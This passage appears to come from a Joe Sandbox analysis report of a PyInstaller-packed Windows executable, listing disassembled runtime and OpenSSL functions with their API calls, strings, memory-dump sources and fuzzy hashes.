                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                                            • String ID: Unhandled exception in script
                                                                                                                                                                                                                                            • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                                            • Opcode ID: 3b326f38696452fedce944a8216705a7f012b21920c96e855d1ab8eaac442c5d
                                                                                                                                                                                                                                            • Instruction ID: 82e56ad8a0df23da2c5ca72204515ecf9651ba7de6e1197dacfbe79d7a3fddff
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3b326f38696452fedce944a8216705a7f012b21920c96e855d1ab8eaac442c5d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D4318772619A8185EB20DFA1E8562F97360FF88788F840235EA4DDBB59DF3CD145D700
                                                                                                                                                                                                                                            Function 00007FF633D62B50 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65windowCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF633D6918F,?,00007FF633D63C55), ref: 00007FF633D62BA0
                                                                                                                                                                                                                                            • MessageBoxW.USER32 ref: 00007FF633D62C2A
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CurrentMessageProcess
                                                                                                                                                                                                                                            • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                                                                                                                                                                                                            • API String ID: 1672936522-3797743490
                                                                                                                                                                                                                                            • Opcode ID: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                                                                                                            • Instruction ID: f9e216a77434f41ddc6c2818c5590be12bae5bfbd5c22c3e413d37561858f23e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2221F732708B4192E7119B94F8467EA73A4FB88784F805236EE8DA7756DF3CD215C740
                                                                                                                                                                                                                                            Function 00007FF633D62710 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF633D61B99), ref: 00007FF633D62760
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CurrentProcess
                                                                                                                                                                                                                                            • String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                            • API String ID: 2050909247-1591803126
                                                                                                                                                                                                                                            • Opcode ID: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                                                                                                                                                                            • Instruction ID: 2ac7761fc5d2d0ce4d1714a694a1c284d2a48211121f43196110f73418939675
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1821B232A19B8192E720DB91F8427E673A4FB88784F801235FE9DA3759DF3CE1459740
                                                                                                                                                                                                                                            Function 00007FF633D79A88 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                            • Opcode ID: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                                                                                                                                                                            • Instruction ID: 6e70702f8cc8c05fd7e2224f32638cf4824501ea2af2367d430ac242eaca4e9f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6CF04F21B0A70681EA108FA4E49677A6320BF45761F541339D67E9A7E4DF3CE048E740
                                                                                                                                                                                                                                            Function 00007FF633D89368 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _set_statfp
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1156100317-0
                                                                                                                                                                                                                                            • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                            • Instruction ID: 1740fa7dea82f0db993d721bdbc789fe3a290f01ab4c766d09565ea55d8dcb9a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1A114F22E5CA0302FA6512EAE4973791150EF59364E046734EAEFFE7DA8E7CB8416104
                                                                                                                                                                                                                                            Function 00007FF633D7B390 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,00007FF633D7A5A3,?,?,00000000,00007FF633D7A83E,?,?,?,?,?,00007FF633D7A7CA), ref: 00007FF633D7B3AF
                                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF633D7A5A3,?,?,00000000,00007FF633D7A83E,?,?,?,?,?,00007FF633D7A7CA), ref: 00007FF633D7B3CE
                                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF633D7A5A3,?,?,00000000,00007FF633D7A83E,?,?,?,?,?,00007FF633D7A7CA), ref: 00007FF633D7B3F6
                                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF633D7A5A3,?,?,00000000,00007FF633D7A83E,?,?,?,?,?,00007FF633D7A7CA), ref: 00007FF633D7B407
                                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF633D7A5A3,?,?,00000000,00007FF633D7A83E,?,?,?,?,?,00007FF633D7A7CA), ref: 00007FF633D7B418
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Value
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3702945584-0
                                                                                                                                                                                                                                            • Opcode ID: 4beba02b960c9f4c122fa6b087f84ea6fe2ade67e0ecd51c72e7f47762a48d3d
                                                                                                                                                                                                                                            • Instruction ID: ca50551e65363582523f6374fa265e7449db3506ccfaf416f793eb32d8966603
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4beba02b960c9f4c122fa6b087f84ea6fe2ade67e0ecd51c72e7f47762a48d3d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F9115E20F0C64281FA689FB5955367962465F447B4F888334E93EFB7D6DE2CE452A300
                                                                                                                                                                                                                                            Function 00007FF633D7B224 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Value
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3702945584-0
                                                                                                                                                                                                                                            • Opcode ID: cda0cba1a061c727c7e2df3b5d45acc099e2ee41b4dfcb91690057491b566149
                                                                                                                                                                                                                                            • Instruction ID: 6eab562e1d83f5d882c4aa02a22574ba7fae9327a1151a8ca1ce9ebb4e4ec727
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cda0cba1a061c727c7e2df3b5d45acc099e2ee41b4dfcb91690057491b566149
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 38113920E0E20781FAA86EF1442367E12424F45370F084734D93EFA7D2DD2CB9507341
                                                                                                                                                                                                                                            Function 00007FFDFAE821C1 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 357COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2034183596.00007FFDFAE81000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAE80000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034141796.00007FFDFAE80000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAEF3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAEF6000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF19000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF24000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF2E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034512265.00007FFDFAF31000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034545589.00007FFDFAF33000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfae80000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: 00007
                                                                                                                                                                                                                                            • String ID: &$..\s\ssl\statem\statem_clnt.c$resumption
                                                                                                                                                                                                                                            • API String ID: 3568877910-1441847574
                                                                                                                                                                                                                                            • Opcode ID: 73da6ed3a122ca658e289fa11470f3a3e71e111d3fe2952cdc4eaf4fdab7512b
                                                                                                                                                                                                                                            • Instruction ID: 5d8f4ce6517c7bcc80e417b94e66c092aa54b875c4a0fb6030d9d7fbd085c592
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 73da6ed3a122ca658e289fa11470f3a3e71e111d3fe2952cdc4eaf4fdab7512b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 88F10372B0868185E7289B15E4A4BBDB7A0FB84B84F058175DAEE577D8DF3EE580C700
                                                                                                                                                                                                                                            Function 00007FFDFAEB4B90 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 268COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2034183596.00007FFDFAE81000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAE80000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034141796.00007FFDFAE80000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAEF3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAEF6000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF19000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF24000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF2E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034512265.00007FFDFAF31000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034545589.00007FFDFAF33000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfae80000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: 00007
                                                                                                                                                                                                                                            • String ID: $..\s\ssl\ssl_sess.c$T
                                                                                                                                                                                                                                            • API String ID: 3568877910-2024727245
                                                                                                                                                                                                                                            • Opcode ID: 4200142c00a380515af32dd588f4d13a0373dba83e7865d16fcefcd847d84a21
                                                                                                                                                                                                                                            • Instruction ID: 9b2ae92ab8785859dbecf54792fa97cf35b89b6e7b3ef58ea6e3584216edec79
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4200142c00a380515af32dd588f4d13a0373dba83e7865d16fcefcd847d84a21
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 42C1753270868182E759AF25D4A8BF92791FB84B88F044076DE6E4B7D9CF3EE955C700
                                                                                                                                                                                                                                            Function 00007FF633D75FA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                            • String ID: verbose
                                                                                                                                                                                                                                            • API String ID: 3215553584-579935070
                                                                                                                                                                                                                                            • Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                            • Instruction ID: 5bfbfe9ee72169a339b73ff0211cb6058e7213603982fe5c203b5fe916921353
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8291F232A08A4685F7658EA4D45637D37A1AB40B94F844336DE9DE33D6FF3CE849A300
                                                                                                                                                                                                                                            Function 00007FF633D7FBC8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                            • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                                            • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                                            • Opcode ID: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                                                                                                                                                                            • Instruction ID: 6d0f7454b8fec6c00dd6cf00228ac33d822e6e7074f624caf0611361992f1dec
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0881CD72E0821385F7749EA9815227826A8EB11B48F558735DA2DFF389CF2DE941B702
                                                                                                                                                                                                                                            Function 00007FFDFAD61FC0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 173COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033758431.00007FFDFAD61000.00000040.00000001.01000000.00000013.sdmp, Offset: 00007FFDFAD60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033713501.00007FFDFAD60000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033758431.00007FFDFADC4000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033758431.00007FFDFAE13000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033758431.00007FFDFAE6C000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033758431.00007FFDFAE71000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033758431.00007FFDFAE74000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034059986.00007FFDFAE75000.00000080.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034101253.00007FFDFAE77000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfad60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: 00007B6570
                                                                                                                                                                                                                                            • String ID: CJK UNIFIED IDEOGRAPH-$HANGUL SYLLABLE
                                                                                                                                                                                                                                            • API String ID: 4069847057-87138338
                                                                                                                                                                                                                                            • Opcode ID: dd12be397e2784a3b9b42d5ec1b23b2ed281038ba6f510f7d5b8d27382faff68
                                                                                                                                                                                                                                            • Instruction ID: e4626b57dd142e38aad635d4ba85b6c1ff1874e06f156893e42656bad2aef596
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dd12be397e2784a3b9b42d5ec1b23b2ed281038ba6f510f7d5b8d27382faff68
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E661E672F1864246E7688E19AC20A7A6292FB90790F548275EE7A47BCDFF3CD405CB40
                                                                                                                                                                                                                                            Function 00007FF633D6D648 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                            • String ID: csm
                                                                                                                                                                                                                                            • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                                            • Opcode ID: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
                                                                                                                                                                                                                                            • Instruction ID: 61be1db25d527b0826e63ee315ab3468e3c2d08d298a55817cdb556ed082ef50
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5F51BF32B196428ADB14CF95F445A787391FB44B98F918230DA6EA779CEF7CE841D700
                                                                                                                                                                                                                                            Function 00007FF633D6F288 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
